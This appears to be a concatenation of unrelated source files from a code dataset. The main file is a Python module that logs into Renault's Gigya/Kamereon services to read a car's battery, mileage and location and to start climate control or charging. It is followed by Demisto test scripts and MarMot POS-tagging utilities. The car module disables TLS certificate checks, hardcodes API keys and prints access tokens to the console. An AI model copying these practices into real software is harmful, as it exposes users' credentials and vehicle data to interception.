g_kamareonAPI = "Ae9FDWugRxZQAGm3Sxgk7uJn6Q4CGEA2" # type: str
g_gigyaURL = "https://accounts.eu1.gigya.com" # type: str
g_gigyaAPI = "3_7PLksOyBRkHv126x5WhHb-5pqC1qFR8pQjxSeLB6nhAnPERTUlwnYoznHSxwX668" # type: str
# austria: "3__B4KghyeUb0GlpU62ZXKrjSfb7CPzwBS368wioftJUL5qXE0Z_sSy0rX69klXuHy"
g_keychain = {}
g_error = False
def clear_keychain(self):
self.g_keychain = {}
def get_date(self):
now = datetime.now()
timenow = now.strftime("%Y%m%d-%H") # shall: "20201028-14" (14 = hour)
return timenow
def check_time(self):
if 'lastJWTCall' in self.g_keychain:
if self.g_keychain["lastJWTCall"] == self.get_date():
return True
self.clear_keychain()
return False
def get_https_response(self, p_url, p_path, p_headers="", p_data=""):
url = p_url + p_path
resp = {"data": "", "code": 418}
# Build a SSL Context to disable certificate verification.
ctx = ssl._create_unverified_context()
if p_headers == "":
request = urllib2.Request(url)
elif p_headers != "" and p_data == "":
request = urllib2.Request(url, headers=p_headers)
else:
request = urllib2.Request(url, data=p_data, headers=p_headers)
# Open the URL and read the response.
response = urllib2.urlopen(request, timeout=3, context=ctx)
resp = {"data": response.read(), "code": response.getcode()}
if resp["code"] != 200:
self.DEBUG.add_message("Http status code " + str(resp["code"]) + " while accessing " + response.url())
return resp
def get_status(self, endpoint, version, kamareonURL, account_id, VIN, gigyaJWTToken, kamareonAPI):
# fetch data from kamereon (single vehicle)
path = '/commerce/v1/accounts/' + account_id + '/kamereon/kca/car-adapter/v' + str(
version) + '/cars/' + VIN + '/' + endpoint + '?country=DE'
headers = {"x-gigya-id_token": gigyaJWTToken, "apikey": kamareonAPI, "Content-type": "application/vnd.api+json"}
api_result = self.get_https_response(self.g_kamareonURL, path, headers)
status_code = api_result["code"]
api_result = api_result["data"]
print("x. " + endpoint + " status: " + str(status_code))
if status_code == 200:
try:
api_result = json.loads(api_result)
except Exception as e:
self.DEBUG.add_exception("Error get_status: " + str(e))
return api_result
else:
return {}
# 1. fetch session from gigya
def get_gigya_cookie_value(self):
renault_user = self._get_input_value(self.PIN_I_S_USER)
renault_pass = self._get_input_value(self.PIN_I_S_PW)
vin = self._get_input_value(self.PIN_I_S_VIN)
path = '/accounts.login?' + urllib.urlencode({'loginID': renault_user,
'password': renault_pass,
'include': 'data',
'apiKey': self.g_gigyaAPI})
try:
api_result = self.get_https_response(self.g_gigyaURL, path)
status_code = api_result["code"]
api_result = api_result["data"]
api_result = json.loads(api_result)
except Exception as e:
self.DEBUG.add_exception("Error get_gigya_cookie_value http response: " + str(e.message))
status_code = 999
api_result = {}
print("1. get_gigya_cookie_value, status code: " + str(status_code))
if int(status_code) != 200:
self.DEBUG.add_message(api_result["errorMessage"])
else:
try:
gigya_cookie_value = api_result["sessionInfo"]["cookieValue"]
self.g_keychain['gigyaCookieValue'] = gigya_cookie_value
self.DEBUG.add_message("Received gigyaCookieValue")
api_result = api_result['data']
person_id = api_result["personId"]
self.g_keychain['gigyaPersonID'] = person_id
self.DEBUG.add_message("Received gigyaPersonId")
gigya_data_center = api_result['gigyaDataCenter']
self.g_keychain['gigyaDataCenter'] = gigya_data_center
self.DEBUG.add_message("Received gigyaDataCenter")
except Exception as e:
self.DEBUG.add_exception("Error getGigyaCookieValue: " + str(e.message))
# 2. fetch user data from gigya
    def get_gigya_user_data(self):
gigya_person_id = ""
gigya_gigya_data_center = ""
if "gigyaPersonID" in self.g_keychain:
gigya_person_id = self.g_keychain['gigyaPersonID']
if "gigyaDataCenter" in self.g_keychain:
gigya_gigya_data_center = self.g_keychain['gigyaDataCenter']
if gigya_person_id == "" or gigya_gigya_data_center == "":
path = '/accounts.getAccountInfo?' + urllib.urlencode({'oauth_token': self.g_keychain['gigyaCookieValue']})
api_result = self.get_https_response(self.g_gigyaURL, path)
api_result = api_result["data"]
api_result = json.loads(api_result)
status_code = api_result["statusCode"]
print("2. get_gigya_user_date, status code: " + str(status_code))
gigya_person_id = api_result["data"]["personId"]
gigya_gigya_data_center = api_result["data"]["gigyaDataCenter"]
self.g_keychain['gigyaPersonID'] = gigya_person_id
self.g_keychain['gigyaDataCenter'] = gigya_gigya_data_center
self.DEBUG.add_message("Received gigyaPersonID")
self.DEBUG.add_message("Received gigyaDataCenter")
else:
print("2. get_gigya_user_date, no action required")
# 3. fetch JWT data from gigya
# renew gigyaJWTToken once a day
def fetch_jwt_data(self):
if 'lastJWTCall' not in self.g_keychain:
self.g_keychain['lastJWTCall'] = 'never'
gigya_jwt_token = ""
if 'gigyaJWTToken' in self.g_keychain:
gigya_jwt_token = self.g_keychain['gigyaJWTToken']
if gigya_jwt_token == "":
expiration = 87000
gigya_cookie_value = self.g_keychain["gigyaCookieValue"]
path = '/accounts.getJWT?' + urllib.urlencode({'oauth_token': gigya_cookie_value,
'login_token': gigya_cookie_value,
'expiration': expiration,
'fields': 'data.personId,data.gigyaDataCenter',
'ApiKey': self.g_gigyaAPI})
api_result = self.get_https_response(self.g_gigyaURL, path)
api_result = api_result["data"]
api_result = json.loads(api_result)
status_code = api_result["statusCode"]
print("3. fetch_jwt_data, status code: " + str(status_code))
gigya_jwt_token = api_result["id_token"]
self.g_keychain['gigyaJWTToken'] = gigya_jwt_token
self.DEBUG.add_message("Received gigyaJWTToken")
call_date = self.get_date()
self.g_keychain['lastJWTCall'] = call_date
self.DEBUG.add_message("Set lastJWTCall")
else:
print("3. fetch_jwt_data, no action required")
# 4. fetch data from kamereon (person)
# if not in Keychain (we try to avoid quota limits here)
def fetch_kamereon_data(self):
account_id = ""
if 'account_id' in self.g_keychain:
account_id = self.g_keychain['account_id']
if account_id == "":
if ("gigyaPersonID" not in self.g_keychain or
"gigyaJWTToken" not in self.g_keychain):
self.DEBUG.add_message("fetch_kamereon_data: Missing items in keychain, aborting.")
return
gigya_person_id = self.g_keychain["gigyaPersonID"]
gigya_jwt_token = self.g_keychain["gigyaJWTToken"]
if (gigya_person_id == "" or
gigya_jwt_token == ""):
self.DEBUG.add_message("fetch_kamereon_data: Missing items in keychain, aborting.")
return
path = '/commerce/v1/persons/' + gigya_person_id + '?=DE'
headers = {"x-gigya-id_token": gigya_jwt_token, "apikey": self.g_kamareonAPI}
api_result = self.get_https_response(self.g_kamareonURL, path, headers)
status_code = api_result["code"]
api_result = api_result["data"]
api_result = json.loads(api_result)
print("4. fetch_kamereon_data, status code: " + str(status_code))
if api_result["type"] == "FUNCTIONAL":
self.DEBUG.add_message(api_result["messages"][0]["message"] + " – Login derzeit nicht möglich. Später nochmal versuchen.")
else:
account_id = api_result["accounts"][0]["accountId"]
self.g_keychain['account_id'] = account_id
self.DEBUG.add_message("Received account_id")
# 5. fetch data from kamereon (all vehicles data)
# we need this only once to get the picture of the car and the VIN!
def fetch_vehicle_data(self):
car_picture = ""
vin = ""
gigya_jwt_token = ""
if 'carPicture' in self.g_keychain:
car_picture = self.g_keychain['carPicture']
if "vin" in self.g_keychain:
vin = self.g_keychain['vin']
if "account_id" not in self.g_keychain:
self.DEBUG.add_message("fetchVehicleData: account_id empty")
return
account_id = self.g_keychain['account_id']
if account_id == "":
self.DEBUG.add_message("fetchVehicleData: account_id empty")
return
if "gigyaJWTToken" not in self.g_keychain:
self.DEBUG.add_message("fetchVehicleData: gigyaJWTToken empty")
return
gigya_jwt_token = self.g_keychain["gigyaJWTToken"]
if gigya_jwt_token == "":
self.DEBUG.add_message("fetchVehicleData: gigyaJWTToken empty")
return
if car_picture == "" or vin == "":
path = '/commerce/v1/accounts/' + account_id + '/vehicles?country=DE'
headers = {"x-gigya-id_token": gigya_jwt_token, "apikey": self.g_kamareonAPI}
try:
api_result = self.get_https_response(self.g_kamareonURL, path, headers)
api_result = api_result["data"]
api_result = json.loads(api_result)
# set carPicture
car_picture = api_result["vehicleLinks"][0]["vehicleDetails"]["assets"][0]["renditions"][0]["url"]
self.g_keychain['carPicture'] = car_picture
self.DEBUG.add_message("Received carPicture")
# set vin
vin = api_result["vehicleLinks"][0]["vin"]
self.g_keychain['vin'] = vin
self.DEBUG.add_message("Received vin")
except Exception as e:
self.DEBUG.add_exception("Exception in vehicleLinks")
self.g_error = True
# NOW WE CAN READ AND SET EVERYTHING INTO AN OBJECT:
all_results = {"carPicture": car_picture}
# real configurator picture of the vehicle
self._set_output_value(self.PIN_O_S_CARPICTURE, car_picture)
# batteryStatus
# version: 2
# batteryLevel = Num (percentage)
# plugStatus = bolean (0/1)
# chargeStatus = bolean (0/1) (?)
try:
print("+++")
print(self.g_kamareonURL + "; " + account_id + "; " + vin + "; " + gigya_jwt_token + "; " + self.g_kamareonAPI)
print("+++")
battery_status = self.get_status('battery-status', 2, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
self.g_kamareonAPI)
all_results["batteryStatus"] = battery_status["data"]
self._set_output_value(self.PIN_O_N_BATTERYLEVEL, int(battery_status["data"]["attributes"]["batteryLevel"]))
self._set_output_value(self.PIN_O_N_PLUGSTATUS, int(battery_status["data"]["attributes"]["plugStatus"]))
self._set_output_value(self.PIN_O_N_CHARGESTATUS,
int(battery_status["data"]["attributes"]["chargingStatus"]))
self._set_output_value(self.PIN_O_N_BATTERYAUTONOMY,
int(battery_status["data"]["attributes"]["batteryAutonomy"]))
self._set_output_value(self.PIN_O_N_BATTERYAVAILABLEENERGY,
int(battery_status["data"]["attributes"]["batteryAvailableEnergy"]))
self._set_output_value(self.PIN_O_N_BATTERYTEMPERATURE,
int(battery_status["data"]["attributes"]["batteryTemperature"]))
except Exception as e:
self.DEBUG.add_exception("Error batteryStatus: " + str(e))
self.g_error = True
# cockpitStatus
# version: 2
# totalMileage = Num (in Kilometres!)
try:
cockpit_status = self.get_status('cockpit', 2, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
self.g_kamareonAPI)
all_results["cockpitStatus"] = cockpit_status["data"]
self._set_output_value(self.PIN_O_N_TOTALMILEAGE, int(cockpit_status["data"]["attributes"]["totalMileage"]))
except Exception as e:
self.DEBUG.add_exception("Error cockpitStatus: " + str(e))
self.g_error = True
# locationStatus
# version: 1
# gpsLatitude
# gpsLongitude
# LastUpdateTime
try:
location_status = self.get_status('location', 1, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
self.g_kamareonAPI)
all_results["locationStatus"] = location_status["data"]
self._set_output_value(self.PIN_O_N_GPSLATITUDE, int(location_status["data"]["attributes"]["gpsLatitude"]))
self._set_output_value(self.PIN_O_N_GPSLONGITUDE,
int(location_status["data"]["attributes"]["gpsLongitude"]))
self._set_output_value(self.PIN_O_S_LASTUPDATETIME,
str(location_status["data"]["attributes"]["lastUpdateTime"]))
except Exception as e:
self.DEBUG.add_exception("Error locationStatus: " + str(e))
self.g_error = True
# chargeSchedule
# note: unused at the moment!
# version: 1
# try:
# chargeSchedule = self.getStatus('charging-settings', 1, self.g_kamareonURL, account_id, vin, gigyaJWTToken,
# self.g_kamareonAPI)
# allResults["chargeSchedule"] = chargeSchedule["data"]
# except Exception as e:
# self.DEBUG.add_message("14106 chargeSchedule: " + str(e))
# hvacStatus
# version: 1
# try:
# hvac_status = self.get_status('hvac-status', 1, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
# self.g_kamareonAPI)
# if "data" in hvac_status:
# all_results["hvacStatus"] = hvac_status["data"]
# print('hvacStatus: ' + str(hvac_status))
# except Exception as e:
# self.DEBUG.add_message("14106 hvacStatus: " + str(e))
# self.g_error = True
# general function to POST status-values to our vehicle
def post_status(self, endpoint, jsondata, version, kamareonURL, account_id, vin, gigyaJWTToken, kamareonAPI):
path = '/commerce/v1/accounts/' + account_id + '/kamereon/kca/car-adapter/v' + str(
version) + '/cars/' + vin + '/actions/' + endpoint + '?country=DE'
headers = {"x-gigya-id_token": gigyaJWTToken, "apikey": kamareonAPI, "Content-type": "application/vnd.api+json"}
api_result = self.get_https_response(kamareonURL, path, headers, jsondata)
return api_result
def reset_ac_feedback(self):
self._set_output_value(self.PIN_O_N_ACFEEDBACK, 0)
def query(self, query_action):
self.clear_keychain()
self.get_access_data()
action = {}
vin = self._get_input_value(self.PIN_I_S_VIN)
print("requesting " + query_action)
if ((vin == 0) or
("account_id" not in self.g_keychain) or
("gigyaJWTToken" not in self.g_keychain)):
print("Required values not in keychain!")
return
account_id = self.g_keychain['account_id']
gigya_jwt_token = self.g_keychain["gigyaJWTToken"]
if query_action == "start_ac":
attr_data = '{"data":{"type":"HvacStart","attributes":{"action":"start","targetTemperature":"21"}}}'
self._set_output_value(self.PIN_O_N_ACFEEDBACK, 1)
action = self.post_status('hvac-start', attr_data, 1, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
self.g_kamareonAPI)
if action["code"] == 200:
self._set_output_value(self.PIN_O_N_ACFEEDBACK, 2)
threading.Timer(300, self.reset_ac_feedback).start()
elif query_action == "stop_ac":
attr_data = '{"data":{"type":"HvacStart","attributes":{"action":"cancel"}}}'
action = self.post_status('hvac-start', attr_data, 1, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
self.g_kamareonAPI)
elif query_action == "start_charge":
attr_data = '{"data":{"type":"ChargingStart","attributes":{"action":"start"}}}'
action = self.post_status('charging-start', attr_data, 1, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
self.g_kamareonAPI)
else:
self.DEBUG.add_message("Query command '" + str(query_action) + "' not known")
if action["code"] == 200:
self.DEBUG.add_message("hvacStatus: " + query_action + " OK")
else:
self.DEBUG.add_message("hvacStatus: " + query_action + " nOK, code was " + str(action["code"]))
def get_access_data(self):
self.get_gigya_cookie_value()
        self.get_gigya_user_data()
self.fetch_jwt_data()
self.fetch_kamereon_data()
def on_timeout(self):
self.DEBUG.add_message("Requesting vehicle data.")
try:
if not self.check_time():
self.get_access_data()
else:
print("Access data still valid! Skipping get_access_data().")
self.fetch_vehicle_data()
except Exception as e:
self.DEBUG.add_exception("Error on_timeout: " + str(e))
interval = int(self._get_input_value(self.PIN_I_N_INTERVAL))
if interval > 0:
threading.Timer(interval, self.on_timeout).start()
def on_init(self):
self.DEBUG = self.FRAMEWORK.create_debug_section()
# do not edit
self.g_kamareonURL = "https://api-wired-prod-1-euw1.wrd-aws.com" # type: str
self.g_kamareonAPI = "Ae9FDWugRxZQAGm3Sxgk7uJn6Q4CGEA2" # type: str
self.g_gigyaURL = "https://accounts.eu1.gigya.com" # type: str
self.g_gigyaAPI = "3_7PLksOyBRkHv126x5WhHb-5pqC1qFR8pQjxSeLB6nhAnPERTUlwnYoznHSxwX668" # type: str
# austria: "3__B4KghyeUb0GlpU62ZXKrjSfb7CPzwBS368wioftJUL5qXE0Z_sSy0rX69klXuHy"
self.g_keychain = {}
self.g_error = False
interval = int(self._get_input_value(self.PIN_I_N_INTERVAL))
if interval > 0:
self.on_timeout()
def on_input_value(self, index, value):
if index == self.PIN_I_N_TRIGGER and value:
self.on_timeout()
elif index == self.PIN_I_N_AC:
if value == 0:
self.query("stop_ac")
else:
self.query("start_ac")
elif index == self.PIN_I_N_CHARGE:
self.query("start_charge")
elif index == self.PIN_I_N_INTERVAL:
if value > 0:
self.on_timeout()
################################################################################
class TestSequenceFunctions(unittest.TestCase):
tst = Zoe_14106_14106(0)
def setUp(self):
print("\n###setUp")
with open("credentials.txt") as f:
self.cred = json.load(f)
self.tst = Zoe_14106_14106(0)
self.tst.on_init()
self.tst.debug_input_value[self.tst.PIN_I_S_PW] = self.cred["PIN_I_S_PW"]
self.tst.debug_input_value[self.tst.PIN_I_S_USER] = self.cred["PIN_I_S_USER"]
self.tst.debug_input_value[self.tst.PIN_I_S_VIN] = self.cred["PIN_I_S_VIN"]
def test_redo(self):
print("### redo")
self.tst.on_input_value(self.tst.PIN_I_N_TRIGGER, 1)
time.sleep(5)
self.tst.on_input_value(self.tst.PIN_I_N_TRIGGER, 1)
self.assertFalse(self.tst.g_error)
def test_clear_keychain(self):
print("### test_clear_keychain")
self.tst.g_keychain = {'lastJWTCall': '20210311-20', 'account_id': '00000000-0000-0000-0000-00000000000',
'vin': '00000000000000000', 'gigyaJWTToken': 'eyJ0eXAiOi',
'gigyaPersonID': '0000', 'carPicture': 'https://...',
'gigyaDataCenter': 'eu1.gigya.com', 'gigyaCookieValue': '...'}
self.assertNotEqual(0, len(self.tst.g_keychain), "a")
self.tst.clear_keychain()
self.assertEqual(0, len(self.tst.g_keychain), "b")
def test_no_route(self):
print("### test_no_route")
self.tst.g_gigyaURL = "192.168.1.100"
self.tst.on_input_value(self.tst.PIN_I_N_TRIGGER, 1)
if __name__ == '__main__':
unittest.main()
| 40.890127 | 138 | 0.580552 |
06f7222086d29a9b6402a84888a4b5d65dd40296
| 1,271 |
py
|
Python
|
Packs/SafeNet_Trusted_Access/Scripts/STAPostProcessing/STAPostProcessing_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/SafeNet_Trusted_Access/Scripts/STAPostProcessing/STAPostProcessing_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/SafeNet_Trusted_Access/Scripts/STAPostProcessing/STAPostProcessing_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
import STAPostProcessing
from STAPostProcessing import close_incident_sta
# Defining output of get_incident_sta function for mocker.
incident_fields = {
'id': 100,
'CustomFields': {
'safenettrustedaccessremoveuserfromunusualactivitygroup': 'Yes',
'safenettrustedaccessusername': 'demouser',
'safenettrustedaccessunusualactivitygroup': 'TestUnusualActivityGroup',
'safenettrustedaccessinstancename': 'SafeNet Trusted Access_instance_1',
}
}
# Defining output of check_user_exist_group_sta function for mocker.
user_exist_group = True
# Tests close_incident_sta function.
def test_close_incident_sta(mocker):
mocker.patch.object(STAPostProcessing, 'get_incident_sta', return_value=incident_fields)
mocker.patch.object(STAPostProcessing, 'check_user_exist_group_sta', return_value=user_exist_group)
execute_mocker = mocker.patch.object(demisto, 'executeCommand')
expected_command = 'sta-remove-user-group'
expected_args = {
'userName': 'demouser',
'groupName': 'TestUnusualActivityGroup',
'using': 'SafeNet Trusted Access_instance_1',
}
close_incident_sta(demisto.args())
execute_mocker.assert_called_with(expected_command, expected_args)
| 37.382353 | 103 | 0.767899 |
b0ea7a1e5c88a3d1279179c14825cadd145a3a09
| 225 |
py
|
Python
|
Packs/CommonScripts/Scripts/ConvertToSingleElementArray/ConvertToSingleElementArray.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CommonScripts/Scripts/ConvertToSingleElementArray/ConvertToSingleElementArray.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CommonScripts/Scripts/ConvertToSingleElementArray/ConvertToSingleElementArray.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
args = demisto.args()
value = args.get("value")
if value and isinstance(value, list):
demisto.results(value)
elif value:
demisto.results([value])
else:
demisto.results([])
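# Behavior sketch (illustrative addition, derived from the branches above):
#   value=[1, 2] -> [1, 2]    value="x" -> ["x"]    value=None or "" -> []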
| 20.454545 | 38 | 0.675556 |
9fe7ba2740acf7e4a8d33dac3debdc5eadc07f41
| 55 |
py
|
Python
|
POOUber/Python/Route.py
|
DanielWilches/POO
|
24624aabede93d428a6a252a4baacd42be166320
|
[
"MIT"
] | null | null | null |
POOUber/Python/Route.py
|
DanielWilches/POO
|
24624aabede93d428a6a252a4baacd42be166320
|
[
"MIT"
] | null | null | null |
POOUber/Python/Route.py
|
DanielWilches/POO
|
24624aabede93d428a6a252a4baacd42be166320
|
[
"MIT"
] | null | null | null |
class Route:
    """Simple data holder for a route."""

    def __init__(self):
        self.id = 0
        self.start = []   # start coordinates
        self.end = []     # end coordinates
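# Usage sketch (illustrative addition; the coordinate values are hypothetical):
# route = Route()
# route.id = 1
# route.start = [4.60971, -74.08175]
# route.end = [4.65145, -74.05687]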
| 13.75 | 15 | 0.418182 |
c6e4f90adf42ebf746ab7269d5531a466f3e415c
| 10,367 |
py
|
Python
|
Src/Scripts/marmot.py
|
hazemalsaied/IdenSys
|
9b6220ff7e65f7059240b742c81952132a765007
|
[
"MIT"
] | 2 |
2017-09-28T13:54:57.000Z
|
2018-06-28T05:03:06.000Z
|
Src/Scripts/marmot.py
|
hazemalsaied/IdenSys
|
9b6220ff7e65f7059240b742c81952132a765007
|
[
"MIT"
] | null | null | null |
Src/Scripts/marmot.py
|
hazemalsaied/IdenSys
|
9b6220ff7e65f7059240b742c81952132a765007
|
[
"MIT"
] | null | null | null |
import os
def getTrainModelCorpus(filePath):
with open(filePath) as corpusFile:
lines = corpusFile.readlines()
createMarmotTrainFile(lines, filePath + '.marmot.train')
def getTestModelCorpus(filePath):
with open(filePath) as corpusFile:
lines = corpusFile.readlines()
createMarmotTestFile(lines, '/Users/halsaied/Downloads/MarMot/test.marmot.hu')
def evaluateMarMot(testOutEvalFile, sharedTaskTestConlluFile):
with open(testOutEvalFile) as testOutEvalFile:
testOutEvallines = testOutEvalFile.readlines()
with open(sharedTaskTestConlluFile) as sharedTaskTestConlluFile:
lines = sharedTaskTestConlluFile.readlines()
lineIdx = 0
finalResult = ''
# iterating over test conllu file
for line in lines:
if len(line) > 0 and line.endswith('\n'):
line = line[:-1]
if line.startswith('#'):
continue
if line == '':
finalResult += '\n'
lineIdx += 1
continue
lineParts = line.split('\t')
if '-' in lineParts[0]:
continue
newLine = testOutEvallines[lineIdx][:-1]
newLineParts = newLine.split('\t')
idx = 0
result = ''
for newlinePart in newLineParts:
if idx == 4:
result += str(lineParts[3])
else:
result += str(newLineParts[idx])
result += '\t'
idx += 1
result = result[:-1] + '\n'
finalResult += result
lineIdx += 1
marmotTestFile = open('/Users/halsaied/Downloads/MarMot/test.gold.eval.pl', 'w+')
marmotTestFile.write(finalResult)
def integrateAutoPOS(conlluFilePath, marmotOutFilePath):
with open(conlluFilePath) as testConlluFile:
lines = testConlluFile.readlines()
with open(marmotOutFilePath) as marmotOutFilePath:
marmotTestOutLines = marmotOutFilePath.readlines()
lineIdx = 0
finalResult = ''
# iterating over test conllu file
for line in lines:
if len(line) > 0 and line.endswith('\n'):
line = line[:-1]
if line.startswith('#'):
finalResult += line + '\n'
continue
if line == '':
finalResult += '\n'
lineIdx += 1
continue
lineParts = line.split('\t')
if '-' in lineParts[0]:
continue
marmotTestOutLine = marmotTestOutLines[lineIdx][:-1]
marmotTestOutLineParts = marmotTestOutLine.split('\t')
idx = 0
result = ''
for linePart in lineParts:
if idx == 3:
result += str(marmotTestOutLineParts[5])
else:
result += str(lineParts[idx])
result += '\t'
idx += 1
result = result[:-1] + '\n'
finalResult += result
lineIdx += 1
marmotTestFile = open(conlluFilePath + '.autoPOS', 'w+')
marmotTestFile.write(finalResult)
def jackknife(foldNum, langName):
corpusPath = os.path.join('/Users/halsaied/Documents/IdenSys/sharedTask/', langName, 'train.conllu')
with open(corpusPath) as corpusFile:
lines = corpusFile.readlines()
foldSize = len(lines) / foldNum
ResultPath = os.path.join('/Users/halsaied/Documents/IdenSys/MarMot/Jackkniffing/', langName)
for i in xrange(0, foldNum):
trainPath = os.path.join(ResultPath, str(i) + '.train.jck.txt')
testPath = os.path.join(ResultPath, str(i) + '.test.jck.txt')
        startCuttingIdx = i * foldSize
        startCuttingIdx = approximateCuttingIdx(startCuttingIdx, lines)
        endCuttingIdx = (i + 1) * foldSize
        endCuttingIdx = approximateCuttingIdx(endCuttingIdx, lines)
        testLines = lines[startCuttingIdx: endCuttingIdx]
        if startCuttingIdx == 0:
            trainLines = lines[endCuttingIdx:]
        elif endCuttingIdx == len(lines) - 1:
            trainLines = lines[: startCuttingIdx]
        else:
            trainLines = lines[:startCuttingIdx] + lines[endCuttingIdx:]
createMarmotTrainFile(trainLines, trainPath)
createMarmotTestFile(testLines, testPath)
def createMarmotTrainFile(lines, trainPath):
trainCorpus = ''
for line in lines:
if len(line) > 0 and line.endswith('\n'):
line = line[:-1]
if line.startswith('#'):
continue
if line == '':
trainCorpus += line + '\n'
continue
lineParts = line.split('\t')
if '-' in lineParts[0]:
continue
if len(lineParts) != 10 or '-' in lineParts[0]:
print 'Error: not-well formatted line: file: ', trainPath, ', line:', line
continue
trainCorpus += lineParts[0] + '\t' + lineParts[1] + '\t' + lineParts[3] + '\n'
marmotTrainFile = open(trainPath, 'w+')
marmotTrainFile.write(trainCorpus)
def createMarmotTestFile(lines, testFilepath):
trainCorpus = ''
for line in lines:
if len(line) > 0 and line.endswith('\n'):
line = line[:-1]
if line.startswith('#'):
continue
if line == '':
trainCorpus += line + '\n'
continue
lineParts = line.split('\t')
if '-' in lineParts[0]:
continue
if len(lineParts) != 10 or '-' in lineParts[0]:
print 'Error: not-well formatted line: file: ', testFilepath, ', line:', line
continue
trainCorpus += lineParts[1] + '\n'
marmotTestFile = open(testFilepath, 'w+')
marmotTestFile.write(trainCorpus)
def approximateCuttingIdx(cuttingIdx, lines):
'''
This method is used to make the fold end and start with complete sentences
:param cuttingIdx:
:param lines:
:return:
'''
if cuttingIdx <= 0:
return 0
if cuttingIdx >= len(lines) - 1:
return len(lines) - 1
while True:
if lines[cuttingIdx][:-1].strip() == '':
return cuttingIdx
if cuttingIdx < len(lines) - 1:
cuttingIdx += 1
else:
return len(lines) - 1
def creatBatchForMarmotJCK(foldNum, langList):
batch = '#!/bin/bash\n'
jckPath = '/Users/halsaied/Documents/IdenSys/MarMot/Jackkniffing/'
for lang in langList.split(','):
for f in xrange(0, foldNum):
trainFile = os.path.join(jckPath, lang, str(f) + '.train.jck.txt')
modelFile = os.path.join(jckPath, lang, str(f) + '.model.jck.txt')
batch += 'java -Xmx5G -cp marmot.jar marmot.morph.cmd.Trainer -train-file form-index=1,tag-index=2,' + trainFile + ' -tag-morph false -model-file ' + modelFile + '\n'
testFile = os.path.join(jckPath, lang, str(f) + '.test.jck.txt')
outputFile = os.path.join(jckPath, lang, str(f) + '.output.jck.txt')
batch += 'java -cp marmot.jar marmot.morph.cmd.Annotator --model-file ' + modelFile + ' --test-file form-index=0,' + testFile + ' --pred-file ' + outputFile + '\n'
batchFile = open(jckPath + 'postag.jck.batch.sh', 'w+')
batchFile.write(batch)
def mergeJckOutFiles(outfilesPath, foldNum, langs):
for lang in langs.split(','):
lines = ''
for subdir, dirs, files in os.walk(os.path.join(outfilesPath, lang)):
for fileIdx in xrange(0, foldNum):
fileFounded = False
for file in files:
if file == str(fileIdx) + '.output.jck.txt':
fileFounded = True
with open(os.path.join(outfilesPath, lang, file)) as jckOutFile:
jckOutLines = jckOutFile.readlines()
jckOutLines = removeFinalEmptyLines(jckOutLines)
for line in jckOutLines:
lines += line
                if not fileFounded:
                    print 'Output file does not exist: ' + str(fileIdx) + '.output.jck.txt'
fileIdx += 1
outFile = open(os.path.join(outfilesPath, lang, 'out.jck.txt'), 'w')
outFile.write(lines)
def removeFinalEmptyLines(linelist):
emptyLinesNum = 0
for line in reversed(linelist):
if line == '\n':
emptyLinesNum += 1
else:
break
for i in xrange(0, emptyLinesNum):
linelist = linelist[:-1]
linelist.append('\n')
return linelist
def verifyAlignment(path1, path2):
with open(path1) as file1:
file1Lines = file1.readlines()
file1Lines = removeFinalEmptyLines(file1Lines)
with open(path2) as file2:
file2Lines = file2.readlines()
file2Lines = removeFinalEmptyLines(file2Lines)
if len(file1Lines) != len(file2Lines):
print 'not the same length'
return False
idx = 0
for line in file1Lines:
if line == '\n' and line != file2Lines[idx]:
print idx
return False
line1Parts = line.split('\t')
line2Parts = file2Lines[idx].split('\t')
if line1Parts[0].strip() != line2Parts[0].strip():
print idx
return False
idx += 1
return True
# creatBatchForMarmotJCK(10, 'FR,HU,CS,PL')
# mergeJckOutFiles('/Users/halsaied/Documents/IdenSys/MarMot/Jackkniffing/', 10, 'FR')
# integrateAutoPOS('/Users/halsaied/Documents/IdenSys/sharedtask/FR/test.conllu', '/Users/halsaied/Documents/IdenSys/MarMot/Output/test.out.fr')
# print verifyAlignment('/Users/halsaied/Documents/IdenSys/sharedtask/HU/train.conllu', '/Users/halsaied/Documents/IdenSys/sharedtask/HU/train.conllu.autoPOS')
mergeJckOutFiles('/Users/halsaied/Documents/IdenSys/MateTools/HU/Jackkniffing/', 10, '')
| 36.893238 | 178 | 0.547217 |
afc96595160dd497eaf82c40fcb210d5e1794755
| 731 |
py
|
Python
|
SoSe-21/Code-Vorlesungen/Wiederholung/Wiederholung-Wortlaenge.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | 1 |
2022-03-23T09:40:39.000Z
|
2022-03-23T09:40:39.000Z
|
SoSe-21/Code-Vorlesungen/Wiederholung/Wiederholung-Wortlaenge.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
SoSe-21/Code-Vorlesungen/Wiederholung/Wiederholung-Wortlaenge.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
